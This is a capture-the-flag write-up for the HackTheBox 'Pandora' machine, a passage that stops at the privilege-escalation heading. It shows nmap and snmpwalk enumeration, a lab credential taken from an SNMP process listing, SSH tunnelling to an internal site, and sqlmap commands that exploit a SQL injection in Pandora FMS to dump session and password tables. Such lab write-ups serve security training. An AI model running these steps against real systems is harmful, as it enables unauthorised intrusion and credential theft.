Pandora 10.10.11.136

Background

Pandora is a Linux base machine from HackTheBox that required your patient on web searching technique with some encoding concepts and Python Hacking skill is required on the privilege escalation.

Target Machine: 10.10.11.136

Attacker Machine: 10.10.14.4

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.11.136 -oG fkclai.nmap 2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.11.136 -o nmap-result.txt

Enumeration Strategies

No vulnerability was found on the SSH and HTTP service, it was going to review the web application to check any information leakage or misconfiguration.

Hacking Process Part 1 – Enumeration

With basic web enumeration using gobuster, a set of web pages was found and the following one was interesting with submission function. However, it does not find any interesting stuff

dirb http://pandora.htb/ /usr/share/wordlists/dirb/common.txt -o dirb-pandora.result

THINKINGS: checking UDP ports

nmap -sC -sV -sU -top-ports=20 pandora.htb

Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.27s latency).

PORT      STATE         SERVICE      VERSION
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 20m46s
| snmp-processes: 
|   1: 
| 
|   2: 
| 
|   3: 
| 
|_  4: 
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 20m46.36s (124636 timeticks)
|_snmp-win32-software: 
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.89 seconds

Checking the opening port one by one

SNMP Port 161

Page not found - HackTricksbook.hacktricks.xyz

// using the command snmpwalk
snmpwalk -v 2c pandora.htb -c public> smpwalk.result

iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"

Get a username danieland password HotelBabylon23, try the SSH connection with this account

Hacking Process Part 2 – Gaining Foothold

Get the Initial access using the credential found at the SNMP connection string

Unfortunately, the account cannot access the user.txt

After reviewing the network, it found that there should be a website hosted internally, but it cannot be accessed outside.

Try to use SSH tunnelling to redirect the page outside

ssh -L 81:127.0.0.1:80 daniel@pandora.htb

The credential found before cannot login this website

A CVE-2020-5844 was found on this v7.0NG.742_FIX_PERL2020, SQL injection vulnariblity was found. Using SQLMap to check the

sqlmap -u "http://127.0.0.1:81/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data --dump

It was found that the name of Database: pandora, table tsessions_php, and related field identified. Changed the command and executed it again

sqlmap -u "http://127.0.0.1:81/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tpassword_history -C id_pass,id_user,data_end,password,data_begin --dump

Hacking Process Part 3 – Privilege Escalation